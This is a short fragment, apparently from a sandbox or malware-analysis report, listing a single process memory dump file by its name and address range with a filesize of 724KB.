                • memory/4088-132-0x000002303B2F0000-0x000002303B3A5000-memory.dmp

                  Filesize

                  724KB